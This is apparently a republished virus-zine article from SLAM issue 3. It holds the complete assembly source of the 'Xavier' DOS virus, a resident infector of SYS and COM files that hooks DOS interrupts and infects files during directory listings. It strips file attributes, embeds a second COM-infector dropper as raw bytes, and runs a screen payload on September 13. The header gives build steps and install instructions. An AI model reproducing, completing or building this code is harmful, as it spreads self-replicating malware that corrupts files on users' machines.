SLAM3.013: The Xavier Virus by Xavirus Hacker

Published in
· 2 years ago
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ; V I R U S ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;€; ; ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ;  €   €  ‹ﬂﬂﬂ‹ €     € € ‹ﬂﬂﬂﬂﬂﬂ ﬂ€ﬂﬂﬂﬂﬂ‹   €; ; ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ;   € €   €   €  €   €  € €        €     €   €; ; ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ;   ﬂ€ﬂ   €   €  €   €  € €ﬂﬂﬂﬂ    €     €   €; ; ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ;   ‹€‹   €ﬂﬂﬂ€   € €   € €        €‹‹‹‹ﬂ    €; ; ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ;   € €   €   €   € €   € €        €    €    €; ; ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ;  €   €  €   €    €    € ﬂ‹‹‹‹‹   €    €    ﬂ; ; ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ; MADE IN LUQUE, PARAGUAY. By Xavirus Hacker ‹; ; ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; 
; ; ;             TSR infector of SYS/COM programs.              ; ; ; ; ; ; 
; ; ;  Infects when a operation with FCB is made (DIR,COPY,etc.) ; ; ; ; ; ; 
; ; ;    The victim is opened in read only mode, then is turned  ; ; ; ; ; ; 
; ; ;      into read/write mode, and the attributes are kicked.   ; ; ; ; ; ; 
; ; ;         Bestial & psycodelic payload on september 13.      ; ; ; ; ; ; 
; ; ;             Time/Date/Attributes preserved.                ; ; ; ; ; ; 
; ; ;     Doesn't reinfects SYS or COM files (hehehehehe).       ; ; ; ; ; ; 
; ; ;                 With thanx to Dark Angel.                  ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ; ; ; How to make the virus work: ; ; ; ; ; ; ; ; ; ; ; ; ; ; 
; ; ; ; ; ; ; ; ; Tasm Xavier.Asm  * Tlink Xavier.Obj ; ; ; ; ; ; ; ; ; ; ; ; 
; ; ; ; ; ; Exe2Bin Xavier.Exe * Ren Xavier.Bin Xavier.Sys; ; ; ; ; ; ; ; ; ; 
; ; ; ; ; Load it as device in your config.sys and that all.; ; ; ; ; ; ; ; ; 

.MODEL TINY 
.CODE 
ORG 0h 

Cabecera: 
 Siguiente_Cabecera  dw  0ffffh,0ffffh 
 Atributo            dw  8000h 
 restrategica        dw  offset Estrategica 
 rinterrupt          dw  offset Interrupcion 
 BautizadoComo       db  'XAVIER! ' 
FinDeCabecera: 

Estrategica: 
 Push   bp 
 Call   DeltaEstrategica 
DeltaEstrategica: 
 Pop    bp 
 Mov    cs:[bp+offset GuardarBX-offset DeltaEstrategica],bx 
 Mov    cs:[bp+offset GuardarES-offset DeltaEstrategica],es 
 Pop    bp 
 retf 

Puente: 
 Jmp    SalirInterrupcion 

Interrupcion: 
 Push   bp 
 Push   ax 
 Push   bx 
 Push   cx 
 Push   dx 
 Push   ds 
 Push   es 
 Push   si 

 Push   cs 
 Pop    ds 
 Call   DeltaInterrupcion 
DeltaInterrupcion: 
 Pop    bp 

 Les    bx,cs:[bp+GuardarBX-DeltaInterrupcion] 
 Mov    es:[bx+3],8103h 
 Cmp    Byte ptr es:[bx+2],0 
 Jnz    Puente 

 Mov    es:[bx+10h],cs 
 Lea    si,[bp+Cabecera-DeltaInterrupcion] 
 Mov    es:[bx+0eh],si 
 Dec    Byte ptr es:[bx+3] 

 Mov    ax,'XA' 
 Int    21h 

 Cmp    cx,'V!' 
 Jz     Puente 

 Add    Word ptr es:[bx+0eh],offset FinMonton 
 Mov    es:[bx+3],0100h 

 Mov    ax,03521h 
 Int    21h 
 Mov    Word ptr cs:[bp+Vieja21h-DeltaInterrupcion],bx 
 Mov    Word ptr cs:[bp+Vieja21h+2-DeltaInterrupcion],es 
 Lea    dx,[bp+Interrupcion21h-DeltaInterrupcion] 
 Push   cs 
 Pop    ds 

 Mov    ax,02521h 
 Int    21h 

 Mov    ah,2ah 
 Int    21h 

 Cmp    dh,09 
 Jne    SalirInterrupcion 
 Cmp    dl,13d 
 Jne    SalirInterrupcion 

 in     al,21h 
 or     al,02 
 out    21h,al 
 Mov    ax,0013h 
 Int    010h 
 Sub    ax,ax 
 Mov    ds,ax 
 Xor    si,si 
Blink: 
 Mov    bx,0417h 
 Mov    Byte ptr [bx],16d 
 Call   Retardo 
 Mov    Byte ptr [bx],32d 
 Call   Retardo 
 Mov    Byte ptr [bx],64d 
 Call   Retardo 
 Push   bx 
 Push   ds 
 Push   cs 
 Pop    ds 

 Mov    ax,0201h 
 Lea    bx,bp+FinMonton 
 Mov    cx,0202 
 Mov    dh,1 
 Mov    dl,1 
 Int    13h 

 Mov    ax,0201h 
 Mov    dl,0 
 Int    13h 

 Pop    ds 
 Pop    bx 
 Inc    si 
 Cmp    si,255 
 jbe    Here 
 Xor    si,si 

Here: 
 Mov    di,0a000h 
 Mov    es,di 
 Mov    cx,65535d 
 Mov    ax,si 
 Repe   Stosb 
 Loop   Blink 

Retardo: 
 Mov    ah,01h 
 Int    16h 
 Mov    cx,30000d 
Pausa: 
 in     al,4Fh 
 Loop   Pausa 
 ret 

 
SalirInterrupcion: 
 Pop    si 
 Pop    es 
 Pop    ds 
 Pop    dx 
 Pop    cx 
 Pop    bx 
 Pop    ax 
 Pop    bp 
 retf 

 db ' [XAVIER!] by Xavirus Hacker ' 

Interrupcion21h: 
 Cmp    ax,'XA' 
 Jnz    ContinuarInt21h 
 Mov    cx,'V!' 
SalirInt21h: 
 iret 
 db 'XH' 
ContinuarInt21h: 
 Pushf 
 db 09ah 
 Vieja21h dw 0,0 
 Pushf 
 Push   bp 
 Push   ax 
 Mov    bp,sp 
 Mov    ax,[bp+4] 
 Mov    [bp+10],ax 
 Pop    ax 
 Pop    bp 
 Popf 

 Cmp    ah,11h 
 Je     UsanFileControlBlock 
 Cmp    ah,12h 
 Je     UsanFileControlBlock 
 iret 

UsanFileControlBlock: 
 Cmp    al,0ffh 
 Je     SalirInt21h 

 Push   bp 
 Call   OtroDelta 
OtroDelta: 
 Pop    bp 
 Sub    bp,offset OtroDelta 

 Push   ax 
 Push   bx 
 Push   cx 
 Push   dx 
 Push   ds 
 Push   es 
 Push   si 
 Push   di 

 Mov    ah,2fh 
 Int    21h 
 Cmp    Byte ptr es:[bx],0ffh 
 Jnz    FCBnormal 

 Add    bx,0007h 
FCBnormal: 
 Mov    cx,es:[bx+1dh] 
 Mov    cs:[bp+Grandor],cx 
 Push   es 
 Pop    ds 
 Push   cs 
 Pop    es 
 cld 

 Lea    di,bp+Victima 
 Mov    si,bx 
 Inc    si 

 Mov    cx,0008h 
Seguir: 
 Cmp    Byte ptr ds:[si],20h 
 Jz     Termino 
 Movsb 
 loop   Seguir 

Termino: 
 Mov    al,"." 
 Stosb 

 Lea    si,[bx+9] 
 Mov    ax,'YS' 
 Cmp    Word ptr [si],ax 
 Jne    PuedeSerCOM 
 stosw 
 Cmp    Byte ptr [si+2],al 
 Jne    RetornoDeLaInt21h 
 Stosb 
 Xor    cx,cx 
 Jmp    short surivaX 

PuedeSerCOM: 
 Mov    ax,'OC' 
 Cmp    Word ptr [si],ax 
 Jne    RetornoDeLaInt21h 
 stosw 
 Mov    al,'M' 
 Cmp    Byte ptr [si+2],al 
 Jne    RetornoDeLaInt21h 
 Stosb 
 Mov    cx,32d 

surivaX: 
 Xor    ax,ax 
 Stosb 
 Push   cs 
 Pop    ds 
 Mov    di,cx 

 Mov    ax,3d00h 
 Lea    dx,bp+Victima 
 Int    21h 
 xchg   bx,ax           ; This takes just 1 byte: XCHG AX,BX takes 2! 
 jc     RetornoDeLaInt21h 

 Mov    ah,3fh 
 Mov    cx,0003d 
 Lea    dx,bp+buffer 
 Int    21h 

 Cmp    Word ptr ds:[bp+buffer],'MZ' 
 Je     Vamos 
 Cmp    Word ptr ds:[bp+buffer],'ZM' 
 Je     Vamos 

 Cmp    di,32d 
 Je     Revisar 
 Inc    Word ptr ds:[bp+buffer] 
 Jz     Putrefaccion 
 Jmp    short Vamos 
Revisar: 
 Cmp    Byte ptr ds:[bp+buffer],0e9h 
 Jne    PudrirCOM 
Vamos: 
 Mov    ah,3eh 
 Int    21h 

RetornoDeLaInt21h: 
 Pop    di 
 Pop    si 
 Pop    es 
 Pop    ds 
 Pop    dx 
 Pop    cx 
 Pop    bx 
 Pop    ax 
 Pop    bp 
 iret 

Putrefaccion: 
 Jmp    PudrirSYS 

PudrirCOM: 
 Push   ds 
 Pop    es 
 Call   ModificarSFT 

 Mov    ax,5700h 
 Int    21h 
 Push   cx 
 Push   dx 

 Mov    ax,4202h 
 cwd 
 Xor    cx,cx 
 Int    21h 

 Sub    ax,3 
 Mov    Word ptr ds:[bp+Salto+1],ax 

 Lea    dx,bp+VirusXavier 
 Mov    ah,40h 
 Mov    cx,016fh 
 Int    21h 

 Mov    ax,4200h 
 Sub    dx,dx 
 Sub    cx,cx 
 Int    21h 

 Lea    dx,bp+Salto 
 Mov    ah,40h 
 Mov    cx,3 
 Int    21h 

 Call   Restoring 

 Pop    dx 
 Pop    cx 
 and    cl,11100000b 
 or     cl,00011111b 
 Mov    ax,5701h 
 Int    21h 
 Jmp    Vamos 

 
ModificarSFT: 
 Push   bx 
 Mov    ax,1220h 
 Int    2fh 

 Mov    ax,1216h 
 Xor    bh,bh 
 Mov    bl,es:[di] 
 Int    2fh 

 Mov    cl,Byte ptr es:[di+4] 
 Mov    Byte ptr cs:[bp+FileAtributo],cl 
 Mov    Byte ptr es:[di+4],20h 
 Mov    Byte ptr es:[di+2],02 
 Mov    Word ptr es:[di+015h],00 
 Mov    Word ptr es:[di+017h],00 
 Pop    bx 
 ret 

 
Restoring: 
 Mov    cl,Byte ptr cs:[bp+FileAtributo] 
 Mov    Byte ptr es:[di+4],cl 
 ret 

PudrirSYS: 
 Push   ds 
 Pop    es 
 Mov    Word ptr ds:[bp+NuevaCabecera+4],8000h 
 Mov    cx,cs:[bp+Grandor] 
 Add    cx,(offset Estrategica-offset Cabecera) 
 Mov    Word ptr ds:[bp+NuevaCabecera+6],cx 
 Add    cx,(offset Interrupcion-offset Estrategica) 
 Mov    Word ptr cs:[bp+NuevaCabecera+8],cx 
 Mov    Word ptr cs:[bp+NuevaCabecera+0],0ffffh 
 Mov    Word ptr cs:[bp+NuevaCabecera+2],0ffffh 

 Call   ModificarSFT 

 Mov    ax,5700h 
 Int    21h 
 Push   cx 
 Push   dx 

 Mov    ah,40h 
 Mov    cx,0002 
 Lea    dx,bp+Grandor 
 Int    21h 

 Mov    ax,4202h 
 Xor    cx,cx 
 cwd 
 Int    21h 

 Mov    ah,40h 
 Mov    cx,18d 
 Lea    dx,bp+NuevaCabecera 
 Int    21h 

 Mov    ah,40h 
 Mov    cx,(offset Monton-offset FinDeCabecera) 
 Lea    dx,bp+FinDeCabecera 
 Int    21h 

 Call   Restoring 

 Pop    dx 
 Pop    cx 
 Mov    ax,5701h 
 Int    21h 
 Jmp    Vamos 

VirusXavier:   ; 016f bytes, virus to be dropped. TSR (IVT) COM fast infector. 
 db 0e8h,000h,000h,05dh,081h,0edh,003h,001h,033h,0c9h,08eh,0c1h,0fch,026h,081h,03eh 
 db 004h,002h,081h,0edh,074h,02ch,0b8h,021h,035h,0cdh,021h,08ch,086h,07eh,001h,089h 
 db 09eh,07ch,001h,033h,0d2h,0bfh,000h,002h,08eh,0c2h,0b9h,06fh,001h,08dh,0b6h,000h 
 db 001h,0f3h,0a4h,0cch,006h,01fh,0b8h,021h,025h,0bah,05bh,002h,0cdh,021h,033h,0c0h 
 db 033h,0d2h,02bh,0dbh,00eh,00eh,01fh,007h,08bh,0cbh,0bfh,000h,001h,08dh,0b6h,061h 
 db 002h,057h,0a4h,0a5h,02bh,0ffh,033h,0edh,02bh,0f6h,0c3h,09ch,03dh,000h,03dh,074h 
 db 025h,03dh,001h,03dh,074h,020h,080h,0fch,04bh,074h,01bh,080h,0fch,041h,074h,016h 
 db 080h,0fch,043h,074h,011h,080h,0fch,056h,074h,00ch,09dh,0eah,000h,000h,000h,000h 
 db 0b0h,003h,0cfh,0e9h,0b5h,000h,050h,053h,051h,052h,056h,057h,01eh,006h,052h,01eh 
 db 0b8h,024h,035h,0cdh,021h,02eh,08ch,006h,066h,003h,02eh,089h,01eh,064h,003h,00eh 
 db 01fh,0b8h,024h,025h,0bah,080h,002h,0cdh,021h,01fh,05ah,01eh,007h,0fch,08bh,0fah 
 db 0b9h,07dh,000h,0b0h,02eh,0f2h,0aeh,075h,0cah,087h,0f7h,0adh,00dh,020h,020h,03dh 
 db 063h,06fh,075h,077h,0ach,00ch,020h,03ch,06dh,075h,070h,0b8h,002h,03dh,0cdh,021h 
 db 072h,069h,093h,00eh,00eh,01fh,007h,0b8h,000h,057h,0cdh,021h,089h,016h,02ah,003h 
 db 089h,00eh,02dh,003h,080h,0e1h,01fh,080h,0f9h,01fh,074h,04bh,0b4h,03fh,0bah,061h 
 db 003h,0b9h,003h,000h,0cdh,021h,08bh,0f2h,08bh,004h,002h,0e0h,080h,0fch,0a7h,074h 
 db 036h,0e8h,051h,000h,03dh,000h,0fah,073h,02eh,02dh,003h,000h,0a3h,05fh,003h,0b4h 
 db 040h,0bah,000h,002h,0b9h,06fh,001h,0cdh,021h,0e8h,034h,000h,0bah,05eh,003h,0b4h 
 db 040h,0b9h,003h,000h,0cdh,021h,0b8h,001h,057h,0bah,000h,000h,0b9h,000h,000h,080h 
 db 0e1h,0e0h,080h,0c9h,01fh,0cdh,021h,0b4h,03eh,0cdh,021h,02eh,0c5h,016h,064h,003h 
 db 0b8h,024h,025h,0cdh,021h,007h,01fh,05fh,05eh,05ah,059h,05bh,058h,0e9h,02ah,0ffh 
 db 0b8h,000h,042h,0ebh,003h,0b8h,002h,042h,02bh,0c9h,099h,0cdh,021h,0c3h 
 Salto       db 0e9h,000h,000h 
 Buffer      db 090h,0cdh,020h,000h,000h,000h,000h 
 BeastName   db 'XAVIER!' 

Monton: 
 Victima       db 13d dup (0) 
 NuevaCabecera db 10d dup (0) 
 Grandor       dw 01d dup (0) 
 FileAtributo  db 0 
 GuardarBX     dw 0 
 GuardarES     dw 0 
 Hora          dw 0 
 Fecha         dw 0 
FinMonton: 

End
SLAM3.013: The Xavier Virus by Xavirus Hacker

Share this article

Let's discover also

SLAM4.037: Kureluque by Xavirus Hacker

SLAM3.014: How a boot virus can hook dos interrupts by SOMNIUN

SLAM3.002: Description of the Word Macro AntiAVs Virus by NJ & AuroDreph [SLAM]

SLAM3.032: How to make your own virus capture files by Virtual Daemon [SLAM]

SLAM3.028: The S˙k˙y˙W˙a˙l˙k˙e˙r virus by Virtual Daemon [SLAM]

SLAM3.027: The ˜Paranoid˜ virus written by Virtual Daemon [SLAM]

SLAM3.016: Lunar Word Macro Virus by Hyperlock [SLAM]

SLAM3.026: EXE Appending Virus Tutorial by Stealth Warrior [SLAM]

SLAM3.023: The "Beavis" virus written by Virtual Daemon [SLAM]

SLAM3.004: The Vicissator Macro Virus by CyberYoda [SLAM]

Recent Articles

SA COJA IN DI DI HOI

BENEDIZIONI SOLENNI DE SA SPOSA E DE SU SPOSU

BABBU NOSTU

The extraterrestrial hypothesis

2.3: CD-ROM Optimizations

2.2: Reading a file from CD-ROM

2.1: About the CD-ROM

2.1. The Principles of PlayStation 3D

1.6: Using the CD-ROM

1.5: Fixed Point Math

Recent Comments
